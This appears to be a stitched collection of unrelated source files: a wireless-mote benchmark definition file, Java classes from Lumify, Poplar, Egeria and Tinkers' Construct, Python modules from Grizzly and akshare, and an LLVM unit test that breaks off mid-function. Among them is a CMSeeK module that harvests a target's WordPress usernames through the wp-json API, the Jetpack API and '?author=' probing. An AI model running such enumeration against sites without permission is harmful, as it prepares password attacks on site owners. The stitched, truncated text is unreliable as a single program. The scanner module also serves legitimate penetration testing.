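//       decltype(std::declval<T&>().resize(std::declval<std::size_t>()));
//
//   template <class T>
//   using has_resize = std::experimental::is_detected<resize_op, T>;
//
//   static_assert(has_resize<std::vector<int>>::value, "vector is resizable");
//   static_assert(!has_resize<int>::value, "int is not");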
/** * User Defined Benchmark Database file * ------------------------------------------------------------------------ * * This is a user-modifiable file, keep it clean, and stay to the rules below. * * Instructions for how to define a benchmark: * 1, All benchmarks MUST begin with a _BMARK_START_(X) macro, where X is its unique identifier. * Note that if multiple benchmarks have the same id, only the first is seen by the program, * others are ignored -- thus only eating expensive memory. * Valid ids are from [200,...,255], lower values are reserved for standard benchmarks. * * 2, All benchmarks MUST end with a _BMARK_END_ macro. * 3, Between these macros, the edges (allowed communication links between two) * separate motes) of the modeled network are enlisted. * * Each edge is a 7-element structure : * { SENDER, RECEIVER, TIMER_DESC, POLICY_DESC, MSG_COUNT, REPLY, 'START_MSG_ID' } * * 4, SENDER: - any positive number, denoting the mote id * RECEIVER: - any positive number other than the sender, denoting the mote id, * - 'ALL', denoting all motes. This automatically implies * that on this edge, broadcasting is used * * TIMER_DESC: * - 'NO_TIMER', if timers are not used on this edge * - {START_TIMER_DESC, STOP_TIMER_DESC} otherwise * * START_TIMER_DESC: * STOP_TIMER_DESC: * - '0', if sending/stopping is not initiated by a timer * - 'TIMER(X)', representing the Xth timer, ex: TIMER(2) * * POLICY_DESC: * - { SEND_TRIG, STOP_TRIG, ACK, 0, 0 } * SEND_TRIG: - 'SEND_ON_REQ', to send only if implicitly required (see below) * - 'SEND_ON_INIT', to send message on benchmark start, * - 'SEND_ON_TIMER', to send message on timer event ( * see START_TIMER_DESC) * STOP_TRIG: - '0', if no message sending stopper is required * - 'STOP_ON_ACK', if message sending is required to stop on an ACK * - 'STOP_ON_TIMER', if message sending is req. to stop on a timer event ( * see STOP_TIMER_DESC) * ACK: - '0', if acknowledgements are not requested * - 'NEED_ACK', if acknowledgements are requested * * MSG_COUNT: - NUM(X), denoting X message(s) to send, where X can be from [1,..,255]. * - NUM(INFINITE), denoting continous message sending. * * REPLY: - 'NO_REPLY', if message is not required to send on reception * - 'REPLY_EDGE(X)', if message is to send on reception on edge X. * - 'REPLY_EDGE(X) | REPLY_EDGE(Y) | ...', if message is to send on reception * on edge X AND on edge Y also. * (the edge ids count from zero in the current benchmark) * * By specifying the edges, the required mote count is implicitly determined by the maximal mote id * present either in the sender or receiver sections of the edge descriptions. (This can aslo be * overridden with a command line option (-mc) of the PC program. ) * * In the following example, the implied mote count is 1: * _BMARK_START_(202) * { 1, ALL, NO_TIMER , ... } * _BMARK_END_ * * However, if someone would like to increase this number (ex. to 4), there is a naughty trick: * _BMARK_START_(202) * { 4, ALL, NO_TIMER , ... } * _BMARK_END_ * * You are encouraged to use this motecount-force, rather than depending on the command-line option. * * For complete examples, see the demo benchmarks below. * These benchmarks are only for demo and reference purposes, so do not hesitate to erase them / comment them out to reduce the memory overhead. * */ // Send 10 messages (Mote1 -> Mote 2) when the test starts, and that's it. 
_BMARK_START_(200) { 1, 2, NO_TIMER , { SEND_ON_INIT, 0, 0, 0, 0 }, NUM(10), NO_REPLY, START_MSG_ID } _BMARK_END_ // Send 10 messages (Mote2 -> Mote 1) when the test starts, and that's it. _BMARK_START_(201) { 2, 1, NO_TIMER , { SEND_ON_INIT, 0, 0, 0, 0 }, NUM(10), NO_REPLY, START_MSG_ID } _BMARK_END_ /* Send 10 broadcast messages when the test starts. * Note: try this benchmark with different motecount options on the PC side * - if motecount is set to 1 (default for this benchmark), no reception is seen in receiver side stats, * - if motecount is set to 2 (-mc 2): 10 reception (Mote 2 is now present, hearing Mote 1), * - if motecount is set to 5 (-mc 5): 40 reception (Mote 2,3,4,5 are present, hearing Mote 1), * - ... */ _BMARK_START_(202) { 1, ALL, NO_TIMER , { SEND_ON_INIT, 0, 0, 0, 0 }, NUM(10), NO_REPLY, START_MSG_ID } _BMARK_END_ // Send 10 messages when the test starts, and request acks. _BMARK_START_(203) { 1, 2, NO_TIMER , { SEND_ON_INIT, 0, NEED_ACK, 0, 0 }, NUM(10), NO_REPLY, START_MSG_ID } _BMARK_END_ // Send a message and request ack for it. If not acked, fallback at most 5 times. _BMARK_START_(204) { 1, 2, NO_TIMER , { SEND_ON_INIT, STOP_ON_ACK, NEED_ACK, 0, 0 }, NUM(5), NO_REPLY, START_MSG_ID } _BMARK_END_ // Mote 1 sends 3 messages to Mote 2. // Mote 2 sends messages to Mote1, stops when ack received and sends at most 7 messages if no ack received. _BMARK_START_(205) { 1, 2, NO_TIMER , { SEND_ON_INIT, 0, 0, 0, 0 }, NUM(3), NO_REPLY, START_MSG_ID }, { 2, 1, NO_TIMER , { SEND_ON_INIT, STOP_ON_ACK, NEED_ACK, 0, 0 }, NUM(7), NO_REPLY, START_MSG_ID } _BMARK_END_ // Start sending continously messages when the test starts. Message sending stops when the test stops. _BMARK_START_(206) { 1, 2, NO_TIMER , { SEND_ON_INIT, 0, 0, 0, 0 }, NUM(INFINITE), NO_REPLY, START_MSG_ID } _BMARK_END_ /** * Mote 1 starts contin. sending msgs to Mote 2 when the test starts. (1st edge) * Also Mote 1 is sending cont. broadcast msgs. (2nd edge) * Mote 3 sends at most 100 messages to Mote 1, request acks, and if it receives an ack, stops. (3rd edge) * * Note that this way the broadcast messages (2nd edge) are heared by Mote 2 and Mote 3, so the receiver side * statistics will be the double of the sender side ones on the 2nd edge. (Since every broadcast message sent by Mote 1 is heared by two motes!) */ _BMARK_START_(207) { 1, 2 , NO_TIMER , { SEND_ON_INIT, 0, 0, 0, 0 }, NUM(INFINITE), NO_REPLY, START_MSG_ID }, { 1, ALL, NO_TIMER , { SEND_ON_INIT, 0, 0, 0, 0 }, NUM(INFINITE), NO_REPLY, START_MSG_ID }, { 3, 1 , NO_TIMER , { SEND_ON_INIT, STOP_ON_ACK, 0, 0, 0 }, NUM(100), NO_REPLY, START_MSG_ID } _BMARK_END_ // Send one message on every timer tick. Timer1 is used. _BMARK_START_(208) { 1, 2, {TIMER(1),0} , { SEND_ON_TIMER, 0, 0, 0, 0 }, NUM(1), NO_REPLY, START_MSG_ID } _BMARK_END_ /* 1st edge: Send at most 10 messages on every timer tick. If ack received, stop sending. Timer1 is used. * 2nd edge: Send one broadcast message to every node when Timer2 tickens. */ _BMARK_START_(209) { 1, 2, {TIMER(1),0} , { SEND_ON_TIMER, STOP_ON_ACK, 0, 0, 0 }, NUM(10), NO_REPLY, START_MSG_ID }, { 1, ALL, {TIMER(2),0} , { SEND_ON_TIMER, 0, 0, 0, 0 }, NUM(1), NO_REPLY, START_MSG_ID } _BMARK_END_ /* Start cont. sending messages on every timer tick of Timer1, and stop sending if Timer2 tickens. * By changing the type (oneshot/periodic) and frequency of the timers, different traffic patterns are * likely to be generated. 
*/ _BMARK_START_(210) { 1, 2, {TIMER(1),TIMER(2)} , { SEND_ON_TIMER, STOP_ON_TIMER, 0, 0, 0 }, NUM(INFINITE), NO_REPLY, START_MSG_ID } _BMARK_END_ /* Mote 1 sends 3 messages on every timer tick of Timer1. * Mote 2 starts cont. sending messages when the test starts and stops it if Timer2 tickens * or receives an ack, whichever comes first. */ _BMARK_START_(211) { 1, 2, {TIMER(1), 0} , { SEND_ON_TIMER, 0, 0, 0, 0 }, NUM(3), NO_REPLY, START_MSG_ID }, { 2, 1, {0,TIMER(2)} , { SEND_ON_INIT, STOP_ON_TIMER | STOP_ON_ACK , 0, 0, 0 }, NUM(INFINITE), NO_REPLY, START_MSG_ID } _BMARK_END_ /* Mote 1 sends 2 messages to Mote 2 on every Timer1 ticks. It stops (only sends one message) if Mote 2 * acknowledges the message. * If Mote 2 hears a message, it replies on edge 1 ( see REPLY_ON(1) of the 1st edge ), which means it * will send one message to Mote 3 (2nd edge). * Since REPLY_ON(2) is present in the 2nd edge, every time Mote 3 hears a message, it should reply on the * 3rd edge: sends one message to Mote 1. */ _BMARK_START_(212) { 1, 2, {TIMER(1),0}, { SEND_ON_TIMER, STOP_ON_ACK, 0, 0, 0 }, NUM(2), REPLY_ON(1), START_MSG_ID }, { 2, 3, NO_TIMER , { SEND_ON_REQ, 0, 0, 0, 0 }, NUM(1), REPLY_ON(2), START_MSG_ID }, { 3, 1, NO_TIMER , { SEND_ON_REQ, 0, 0, 0, 0 }, NUM(1), NO_REPLY, START_MSG_ID } _BMARK_END_ /* 1st edge : Mote 1 -> Mote 2: Exactly 2 messages on Timer1 ticks, request acks. * - every time Mote 2 hears a message from this edge, it should reply on the 3rd edge ( see REPLY_ON(2) ) * 2nd edge : Mote 3 -> Mote 2: One message on every Timer2 ticks, stop either on Timer3 ticks or on acks. * - note that in this case the STOP_ON_X policies are useless, since * on this edge only one message is to be sent, so no use to 'stop' it... * - every time Mote 2 hears a message from this edge, it should reply on the 3rd edge ( see REPLY_ON(2) ) * 3rd edge : Mote 2 broadcasts exactly one message. * - if anyone (Mote 1,Mote 3) hears it, it should reply on the 4th edge ( REPLY_ON(3) ). Since the 4th edge's * sender is 3, this only applies for Mote 3. * 4th edge : Mote 3 -> Mote 1: Exactly 4 messages to transmit. * - note that this edge has SEND_ON_INIT, so 4 messages are also transmitted when the test starts, * not just when Mote 3 replies for messages it gets on the 3rd edge! */ _BMARK_START_(213) { 1, 2, {TIMER(1),0}, { SEND_ON_TIMER, 0, NEED_ACK, 0, 0 }, NUM(2), REPLY_ON(2), START_MSG_ID }, { 3, 2, {TIMER(2),TIMER(3)}, { SEND_ON_TIMER, STOP_ON_TIMER | STOP_ON_ACK, 0, 0, 0 }, NUM(1), REPLY_ON(2), START_MSG_ID }, { 2, ALL, NO_TIMER , { SEND_ON_REQ, 0, 0, 0, 0 }, NUM(1), REPLY_ON(3), START_MSG_ID }, { 3, 1, NO_TIMER , { SEND_ON_INIT, 0, 0, 0, 0 }, NUM(4) , NO_REPLY, START_MSG_ID } _BMARK_END_
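/* A hypothetical user-defined template (not one of the shipped demos above): it follows the
 * same edge syntax as demos 200-213. The benchmark id 254 and the edge parameters are arbitrary
 * placeholders from the user id range [200..255] -- uncomment and adjust them to define a real
 * benchmark.
 *
 * // Mote 1 sends at most 5 acknowledged messages to Mote 2 on every Timer1 tick.
 * _BMARK_START_(254)
 *   { 1, 2, {TIMER(1),0} , { SEND_ON_TIMER, 0, NEED_ACK, 0, 0 }, NUM(5), NO_REPLY, START_MSG_ID }
 * _BMARK_END_
 */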
package io.lumify.core.model.properties.types;

import io.lumify.core.exception.LumifyException;
import io.lumify.core.ingest.video.VideoTranscript;
import org.securegraph.property.StreamingPropertyValue;
import org.apache.commons.io.IOUtils;
import org.json.JSONObject;

import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.io.InputStream;

public class VideoTranscriptProperty extends LumifyProperty<VideoTranscript, StreamingPropertyValue> {
    public VideoTranscriptProperty(String inKey) {
        super(inKey);
    }

    @Override
    public StreamingPropertyValue wrap(VideoTranscript value) {
        InputStream in = new ByteArrayInputStream(value.toJson().toString().getBytes());
        StreamingPropertyValue result = new StreamingPropertyValue(in, byte[].class);
        result.searchIndex(false);
        return result;
    }

    @Override
    public VideoTranscript unwrap(Object value) {
        String strValue = null;
        if (value instanceof StreamingPropertyValue) {
            try {
                strValue = IOUtils.toString(((StreamingPropertyValue) value).getInputStream());
            } catch (IOException e) {
                throw new LumifyException("Could not read property value", e);
            }
        } else if (value != null) {
            strValue = value.toString();
        }
        JSONObject json = new JSONObject(strValue);
        return new VideoTranscript(json);
    }
}
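// A hypothetical round-trip sketch (not part of Lumify): it exercises only the wrap()/unwrap()
// methods defined above. The property key is a placeholder, and the no-argument VideoTranscript
// constructor is an assumption about that class, not a confirmed Lumify API.
import io.lumify.core.ingest.video.VideoTranscript;
import io.lumify.core.model.properties.types.VideoTranscriptProperty;
import org.securegraph.property.StreamingPropertyValue;

class VideoTranscriptPropertyRoundTrip {
    public static void main(String[] args) {
        VideoTranscriptProperty property = new VideoTranscriptProperty("http://lumify.io#videoTranscript"); // placeholder key
        VideoTranscript transcript = new VideoTranscript();        // assumed no-arg constructor
        StreamingPropertyValue stored = property.wrap(transcript); // serializes toJson() into streaming bytes
        VideoTranscript restored = property.unwrap(stored);        // reads the bytes back and re-parses the JSON
        System.out.println(restored.toJson());
    }
}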
""" Implements method forwarding from one class to another. The `Forwarding` class can be used as a mixin. """ import inspect import warnings class Forwarding(object): @classmethod def _get_class_that_defined_method(cls, meth): """ Returns the class that defines the requested method. For methods that are defined outside of a particular set of Grizzly-defined classes, Grizzly will first evaluate lazy results before forwarding the data to the requested class. """ if inspect.ismethod(meth): for cls in inspect.getmro(meth.__self__.__class__): if cls.__dict__.get(meth.__name__) is meth: return cls if inspect.isfunction(meth): return getattr(inspect.getmodule(meth), meth.__qualname__.split('.<locals>', 1)[0].rsplit('.', 1)[0]) @classmethod def _requires_forwarding(cls, meth): defined_in = cls._get_class_that_defined_method(meth) if defined_in is not None and defined_in is not cls: return True else: return False @classmethod def _forward(cls, to_cls): from functools import wraps def forward_decorator(func): @wraps(func) def forwarding_wrapper(self, *args, **kwargs): self.evaluate() result = func(self, *args, **kwargs) # Unsupported functions will return Series -- try to # switch back to GrizzlySeries. if not isinstance(result, cls) and isinstance(result, to_cls): try_convert = cls(data=result.values, index=result.index) if not isinstance(try_convert, cls): warnings.warn("Unsupported operation '{}' produced unsupported Series: falling back to Pandas".format( func.__name__)) return try_convert return result return forwarding_wrapper return forward_decorator @classmethod def add_forwarding_methods(cls, to_cls): """ Add forwarding methods from this class to `to_cls`. """ methods = dir(cls) for meth in methods: if meth.startswith("_"): # We only want to do this for API methods. continue attr = getattr(cls, meth) if cls._requires_forwarding(attr): setattr(cls, meth, cls._forward(to_cls)(attr))
<reponame>zjbjbj/Poplar<gh_stars>100-1000
package com.lvwangbeta.poplar.tag.service;

import java.util.ArrayList;
import java.util.List;

import com.alibaba.dubbo.config.annotation.Service;
import com.lvwangbeta.poplar.common.intr.TagService;
import com.lvwangbeta.poplar.common.model.Tag;
import com.lvwangbeta.poplar.tag.dao.TagDAO;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.beans.factory.annotation.Qualifier;

@Service
public class TagServiceImpl implements TagService {

    //@Autowired
    //@Qualifier("tagIndexService")
    //private TagIndexService tagIndexService;

    @Autowired
    @Qualifier("tagDao")
    private TagDAO tagDao;

    /*
    public List<Tag> searchTag(String term) {
        List<Integer> tag_ids = tagIndexService.findTag(term);
        return getTagsByIDs(tag_ids);
    }
    */

    /**
     * Get recommended tags.
     * Simple implementation: return the tags that have a cover image.
     * @param user_id
     * @return
     */
    public List<Tag> getRecommendTags(int user_id){
        return tagDao.getTagsHasCover();
    }

    public Tag getTagByID(int id) {
        return tagDao.getTagByID(id);
    }

    public List<Tag> getTagsByIDs(List<Integer> ids) {
        List<String> ids_str = new ArrayList<String>();
        for(int i=0; i<ids.size(); i++) {
            ids_str.add(String.valueOf(ids.get(i)));
        }
        return tagDao.getTags(ids_str.toString().replace('[', ' ').replace(']', ' '));
    }
}
<filename>akshare/energy/energy_oil.py<gh_stars>1000+
# -*- coding:utf-8 -*-
#!/usr/bin/env python
"""
Date: 2020/4/2 20:24
Desc: Eastmoney - Data Center - China oil prices
http://data.eastmoney.com/cjsj/oil_default.html
"""
import json

import pandas as pd
import requests


def energy_oil_hist() -> pd.DataFrame:
    """
    Historical price adjustments for gasoline and diesel
    http://data.eastmoney.com/cjsj/oil_default.html
    :return: historical gasoline and diesel price adjustment data
    :rtype: pandas.DataFrame
    """
    url = "http://datacenter.eastmoney.com/api/data/get"
    params = {
        "type": "RPTA_WEB_YJ_BD",
        "sty": "ALL",
        "source": "WEB",
        "p": "1",
        "ps": "5000",
        "st": "dim_date",
        "sr": "-1",
        "var": "OxGINxug",
        "rt": "52861006",
    }
    r = requests.get(url, params=params)
    data_text = r.text
    data_json = json.loads(data_text[data_text.find("{"): -1])
    temp_df = pd.DataFrame(data_json["result"]["data"])
    temp_df.columns = ["日期", "汽油价格", "柴油价格", "汽油涨幅", "柴油涨幅"]
    return temp_df


def energy_oil_detail(date: str = "2020-03-19") -> pd.DataFrame:
    """
    Gasoline and diesel prices for every region of China
    http://data.eastmoney.com/cjsj/oil_default.html
    :param date: call function: energy_oil_hist to get the date point
    :type date: str
    :return: oil price at specific date
    :rtype: pandas.DataFrame
    """
    url = "http://datacenter.eastmoney.com/api/data/get"
    params = {
        "type": "RPTA_WEB_YJ_JH",
        "sty": "ALL",
        "source": "WEB",
        "p": "1",
        "ps": "5000",
        "st": "cityname",
        "sr": "1",
        "filter": f'(dim_date="{date}")',
        "var": "todayPriceData",
    }
    r = requests.get(url, params=params)
    data_text = r.text
    data_json = json.loads(data_text[data_text.find("{"): -1])
    temp_df = pd.DataFrame(data_json["result"]["data"]).iloc[:, 1:]
    return temp_df


if __name__ == "__main__":
    energy_oil_hist_df = energy_oil_hist()
    print(energy_oil_hist_df)

    energy_oil_detail_df = energy_oil_detail(date="2021-04-01")
    print(energy_oil_detail_df)
#!/usr/bin/python3 # -*- coding: utf-8 -*- # This is a part of CMSeeK, check the LICENSE file for more information # Copyright (c) 2018 Tuhinshubhra import cmseekdb.basic as cmseek ## Good old module import re ## Comes in handy while detecting version import json ## For parsing the wpvulndb result import threading wpparamuser = [] def wpauthorenum(ua, url, param): ## WordPress function for Collecting usernames from author Parameter ## Had to create a different function to avoid some pickle issues global wpparamuser param = param + 1 i = str(param) # cmseek.statement('Checking for ?author=' + i) # Looks Ugly.. enable if you want over verbose result authorsrc = cmseek.getsource(url + '/?author=' + i, ua) if authorsrc[0] == '1' and '/author/' in authorsrc[3]: ## Detection using the url redirection author = re.findall(r'/author/(.*?)/', str(authorsrc[3])) if author != []: cmseek.success('Found user from redirection: ' + cmseek.fgreen + cmseek.bold + author[0] + cmseek.cln) wpparamuser.append(author[0]) elif authorsrc[0] == '1' and '/author/' in authorsrc[1]: author = re.findall(r'/author/(.*?)/', str(authorsrc[1])) if author != []: cmseek.success('Found user from source code: ' + cmseek.fgreen + cmseek.bold + author[0] + cmseek.cln) wpparamuser.append(author[0]) def start(id, url, ua, ga, source): cmseek.info("Starting Username Harvest") # User enumertion via site's json api cmseek.info('Harvesting usernames from wp-json api') wpjsonuser = [] wpjsonsrc = cmseek.getsource(url + '/wp-json/wp/v2/users', ua) if wpjsonsrc[0] != "1" or 'slug' not in wpjsonsrc[1]: cmseek.warning("Json api method failed trying with next") else: try: for user in json.loads(wpjsonsrc[1]): wpjsonuser.append(user['slug']) cmseek.success("Found user from wp-json : " + cmseek.fgreen + cmseek.bold + user['slug'] + cmseek.cln) except: cmseek.warning("Failed to parse json") # user enumertion vua jetpack api cmseek.info('Harvesting usernames from jetpack public api') jpapiuser = [] strippedurl = url.replace('http://','') strippedurl = strippedurl.replace('https://', '') # Pretty sure it is an ugly solution but oh well jpapisrc = cmseek.getsource('https://public-api.wordpress.com/rest/v1.1/sites/' + strippedurl + '/posts?number=100&pretty=true&fields=author', ua) if jpapisrc[0] != '1' or 'login' not in jpapisrc[1]: cmseek.warning('No results from jetpack api... 
maybe the site doesn\'t use jetpack') else: for user in json.loads(jpapisrc[1])['posts']: if user['author']['login'] not in str(jpapiuser): jpapiuser.append(user['author']['login']) cmseek.success("Found user from Jetpack api : " + cmseek.fgreen + cmseek.bold + user['author']['login'] + cmseek.cln) jpapiuser = list(set(usr.strip() for usr in jpapiuser)) # Removing duplicate usernames # the regular way of checking vua user Parameter -- For now just check upto 20 ids cmseek.info('Harvesting usernames from wordpress author Parameter') usrrange = range(31) # ain't it Obvious threads = [threading.Thread(target=wpauthorenum, args=(ua,url,r)) for r in usrrange] for thread in threads: thread.start() for thread in threads: thread.join() global wpparamuser # Combine all the usernames that we collected usernames = set(wpjsonuser+jpapiuser+wpparamuser) if len(usernames) > 0: usernamesgen = '1' # Some usernames were harvested if len(usernames) == 1: cmseek.success(cmseek.bold + cmseek.fgreen + str(len(usernames)) + " Usernames" + " was enumerated" + cmseek.cln) else: cmseek.success(cmseek.bold + cmseek.fgreen + str(len(usernames)) + " Usernames" + " were enumerated" + cmseek.cln) else: usernamesgen = '0' # Failure cmseek.warning("Couldn't enumerate usernames :( ") return [usernamesgen, usernames]
/* SPDX-License-Identifier: Apache-2.0 */ /* Copyright Contributors to the ODPi Egeria project. */ package org.odpi.openmetadata.accessservices.governanceprogram.handlers; import org.odpi.openmetadata.accessservices.governanceprogram.properties.GovernanceDomain; import org.odpi.openmetadata.repositoryservices.connectors.stores.metadatacollectionstore.properties.instances.EnumPropertyValue; import org.odpi.openmetadata.repositoryservices.connectors.stores.metadatacollectionstore.properties.instances.InstanceProperties; import org.odpi.openmetadata.repositoryservices.connectors.stores.metadatacollectionstore.properties.instances.InstancePropertyValue; import org.odpi.openmetadata.repositoryservices.connectors.stores.metadatacollectionstore.repositoryconnector.OMRSRepositoryHelper; import org.slf4j.Logger; import org.slf4j.LoggerFactory; /** * GovernanceProgramEnumHandler manages the mapping between Enums in the OMAS API and the open metadata types. */ class GovernanceProgramEnumHandler { private static final Logger log = LoggerFactory.getLogger(GovernanceProgramEnumHandler.class); private String serviceName; private OMRSRepositoryHelper repositoryHelper; /** * Construct the enum handler handler with a link to the property server's connector and this access service's * official name. * * @param repositoryHelper repository helper for the OMAS * @param serviceName name of this omas* @param serviceName name of this service */ GovernanceProgramEnumHandler(String serviceName, OMRSRepositoryHelper repositoryHelper) { this.serviceName = serviceName; this.repositoryHelper = repositoryHelper; } /** * Set up a property value for the GovernanceDomain enum property. * * @param properties current properties * @param governanceDomain enum value * @param propertyName name of the property that supplied the enum * @param methodName calling method * @return InstanceProperties object with the enum value added */ InstanceProperties addGovernanceDomainToProperties(InstanceProperties properties, GovernanceDomain governanceDomain, String propertyName, String methodName) { int ordinal = 999; String symbolicName = null; String description = null; log.debug("Governance domain: " + governanceDomain.getName()); final int element1Ordinal = 0; final String element1Value = "Unclassified"; final String element1Description = "The governance domain is not specified."; final int element2Ordinal = 1; final String element2Value = "Data"; final String element2Description = "The data (information) governance domain."; final int element3Ordinal = 2; final String element3Value = "Privacy"; final String element3Description = "The data privacy domain."; final int element4Ordinal = 3; final String element4Value = "Security"; final String element4Description = "The security governance domain."; final int element5Ordinal = 4; final String element5Value = "ITInfrastructure"; final String element5Description = "The IT infrastructure governance domain."; final int element6Ordinal = 5; final String element6Value = "SoftwareDevelopment"; final String element6Description = "The software development lifecycle governance domain."; final int element7Ordinal = 6; final String element7Value = "Corporate"; final String element7Description = "The corporate governance domain."; final int element8Ordinal = 7; final String element8Value = "AssetManagement"; final String element8Description = "The physical asset management governance domain."; final int element99Ordinal = 99; final String element99Value = "Other"; final String element99Description = 
"Another governance domain."; switch (governanceDomain) { case UNCLASSIFIED: ordinal = element1Ordinal; symbolicName = element1Value; description = element1Description; break; case DATA: ordinal = element2Ordinal; symbolicName = element2Value; description = element2Description; break; case PRIVACY: ordinal = element3Ordinal; symbolicName = element3Value; description = element3Description; break; case SECURITY: ordinal = element4Ordinal; symbolicName = element4Value; description = element4Description; break; case IT_INFRASTRUCTURE: ordinal = element5Ordinal; symbolicName = element5Value; description = element5Description; break; case SOFTWARE_DEVELOPMENT: ordinal = element6Ordinal; symbolicName = element6Value; description = element6Description; break; case CORPORATE: ordinal = element7Ordinal; symbolicName = element7Value; description = element7Description; break; case ASSET_MANAGEMENT: ordinal = element8Ordinal; symbolicName = element8Value; description = element8Description; break; case OTHER: ordinal = element99Ordinal; symbolicName = element99Value; description = element99Description; break; } return repositoryHelper.addEnumPropertyToInstance(serviceName, properties, propertyName, ordinal, symbolicName, description, methodName); } /** * Retrieve the GovernanceDomain enum property from the instance properties of an entity * * @param properties entity properties * @param propertyName name of the property that supplied the enum * @param methodName calling method * @return governanceDomain enum value */ GovernanceDomain getGovernanceDomainFromProperties(InstanceProperties properties, String propertyName, String methodName) { GovernanceDomain governanceDomain = GovernanceDomain.OTHER; if (properties != null) { InstancePropertyValue instancePropertyValue = properties.getPropertyValue(propertyName); if (instancePropertyValue instanceof EnumPropertyValue) { EnumPropertyValue enumPropertyValue = (EnumPropertyValue)instancePropertyValue; switch (enumPropertyValue.getOrdinal()) { case 0: governanceDomain = GovernanceDomain.UNCLASSIFIED; break; case 1: governanceDomain = GovernanceDomain.DATA; break; case 2: governanceDomain = GovernanceDomain.PRIVACY; break; case 3: governanceDomain = GovernanceDomain.SECURITY; break; case 4: governanceDomain = GovernanceDomain.IT_INFRASTRUCTURE; break; case 5: governanceDomain = GovernanceDomain.SOFTWARE_DEVELOPMENT; break; case 6: governanceDomain = GovernanceDomain.CORPORATE; break; case 7: governanceDomain = GovernanceDomain.ASSET_MANAGEMENT; break; case 99: governanceDomain = GovernanceDomain.OTHER; break; } } } log.debug("Governance domain: " + governanceDomain.getName() + " for method " + methodName); return governanceDomain; } }
<filename>src/main/java/slimeknights/tconstruct/common/network/UpdateNeighborsPacket.java package slimeknights.tconstruct.common.network; import lombok.RequiredArgsConstructor; import net.minecraft.block.Block; import net.minecraft.block.BlockState; import net.minecraft.client.Minecraft; import net.minecraft.network.PacketBuffer; import net.minecraft.util.math.BlockPos; import net.minecraft.world.World; import net.minecraftforge.common.util.Constants.BlockFlags; import net.minecraftforge.fml.network.NetworkEvent.Context; import net.minecraftforge.registries.GameData; import slimeknights.mantle.network.packet.IThreadsafePacket; /** * Packet to notify neighbors that a block changed, used when breaking blocks in weird contexts that vanilla suppresses updates in for some reason */ @RequiredArgsConstructor public class UpdateNeighborsPacket implements IThreadsafePacket { private final BlockState state; private final BlockPos pos; public UpdateNeighborsPacket(PacketBuffer buffer) { this.state = GameData.getBlockStateIDMap().getByValue(buffer.readVarInt()); this.pos = buffer.readBlockPos(); } @Override public void encode(PacketBuffer buffer) { buffer.writeVarInt(Block.getStateId(state)); buffer.writeBlockPos(pos); } @Override public void handleThreadsafe(Context context) { HandleClient.handle(this); } private static class HandleClient { private static void handle(UpdateNeighborsPacket packet) { World world = Minecraft.getInstance().world; if (world != null) { packet.state.updateNeighbours(world, packet.pos, BlockFlags.BLOCK_UPDATE, 511); packet.state.updateDiagonalNeighbors(world, packet.pos, BlockFlags.BLOCK_UPDATE, 511); } } } }
<gh_stars>1000+ //===--- llvm/unittest/IR/VectorTypesTest.cpp - vector types unit tests ---===// // // Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions. // See https://llvm.org/LICENSE.txt for license information. // SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception // //===----------------------------------------------------------------------===// #include "llvm/IR/DataLayout.h" #include "llvm/IR/DerivedTypes.h" #include "llvm/IR/LLVMContext.h" #include "llvm/Support/TypeSize.h" #include "gtest/gtest.h" using namespace llvm; namespace { #define EXPECT_VTY_EQ(LHS, RHS) \ ASSERT_NE(LHS, nullptr) << #LHS << " must not be null"; \ ASSERT_NE(RHS, nullptr) << #RHS << " must not be null"; \ EXPECT_EQ(LHS, RHS) << "Expect that " << #LHS << " == " << #RHS << " where " \ << #LHS << " = " << *LHS << " and " << #RHS << " = " \ << *RHS; #define EXPECT_VTY_NE(LHS, RHS) \ ASSERT_NE(LHS, nullptr) << #LHS << " must not be null"; \ ASSERT_NE(RHS, nullptr) << #RHS << " must not be null"; \ EXPECT_NE(LHS, RHS) << "Expect that " << #LHS << " != " << #RHS << " where " \ << #LHS << " = " << *LHS << " and " << #RHS << " = " \ << *RHS; TEST(VectorTypesTest, FixedLength) { LLVMContext Ctx; Type *Int8Ty = Type::getInt8Ty(Ctx); Type *Int16Ty = Type::getInt16Ty(Ctx); Type *Int32Ty = Type::getInt32Ty(Ctx); Type *Int64Ty = Type::getInt64Ty(Ctx); Type *Float64Ty = Type::getDoubleTy(Ctx); auto *V16Int8Ty = FixedVectorType::get(Int8Ty, 16); ASSERT_NE(nullptr, V16Int8Ty); EXPECT_EQ(V16Int8Ty->getNumElements(), 16U); EXPECT_EQ(V16Int8Ty->getElementType()->getScalarSizeInBits(), 8U); auto *V8Int32Ty = dyn_cast<FixedVectorType>(VectorType::get(Int32Ty, 8, false)); ASSERT_NE(nullptr, V8Int32Ty); EXPECT_EQ(V8Int32Ty->getNumElements(), 8U); EXPECT_EQ(V8Int32Ty->getElementType()->getScalarSizeInBits(), 32U); auto *V8Int8Ty = dyn_cast<FixedVectorType>(VectorType::get(Int8Ty, V8Int32Ty)); EXPECT_VTY_NE(V8Int32Ty, V8Int8Ty); EXPECT_EQ(V8Int8Ty->getElementCount(), V8Int32Ty->getElementCount()); EXPECT_EQ(V8Int8Ty->getElementType()->getScalarSizeInBits(), 8U); auto *V8Int32Ty2 = dyn_cast<FixedVectorType>(VectorType::get(Int32Ty, V8Int32Ty)); EXPECT_VTY_EQ(V8Int32Ty, V8Int32Ty2); auto *V8Int16Ty = dyn_cast<FixedVectorType>( VectorType::get(Int16Ty, ElementCount::getFixed(8))); ASSERT_NE(nullptr, V8Int16Ty); EXPECT_EQ(V8Int16Ty->getNumElements(), 8U); EXPECT_EQ(V8Int16Ty->getElementType()->getScalarSizeInBits(), 16U); auto EltCnt = ElementCount::getFixed(4); auto *V4Int64Ty = dyn_cast<FixedVectorType>(VectorType::get(Int64Ty, EltCnt)); ASSERT_NE(nullptr, V4Int64Ty); EXPECT_EQ(V4Int64Ty->getNumElements(), 4U); EXPECT_EQ(V4Int64Ty->getElementType()->getScalarSizeInBits(), 64U); auto *V2Int64Ty = dyn_cast<FixedVectorType>( VectorType::get(Int64Ty, EltCnt.divideCoefficientBy(2))); ASSERT_NE(nullptr, V2Int64Ty); EXPECT_EQ(V2Int64Ty->getNumElements(), 2U); EXPECT_EQ(V2Int64Ty->getElementType()->getScalarSizeInBits(), 64U); auto *V8Int64Ty = dyn_cast<FixedVectorType>(VectorType::get(Int64Ty, EltCnt * 2)); ASSERT_NE(nullptr, V8Int64Ty); 